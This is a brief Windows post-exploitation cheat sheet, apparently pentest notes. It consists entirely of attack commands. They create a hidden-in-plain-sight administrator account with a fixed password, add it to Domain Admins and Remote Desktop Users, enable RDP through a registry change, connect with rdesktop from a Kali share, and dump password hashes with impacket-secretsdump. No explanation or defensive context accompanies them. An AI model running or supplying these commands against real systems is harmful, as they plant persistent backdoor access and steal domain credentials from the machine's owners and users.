Windows Post-Exploitation

net user myprecious MyPrecious123 /add
net localgroup Administrators myprecious /add
net localgroup "Remote Desktop Users" myprecious /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user myprecious

net group "Domain Admins" myprecious /add

rdesktop $IP -u myprecious -p MyPrecious123 -r disk:myshare=/home/kali/share

Dump hashes

impacket-secretsdump myprecious:MyPrecious123@$IP -outputfile secretsdump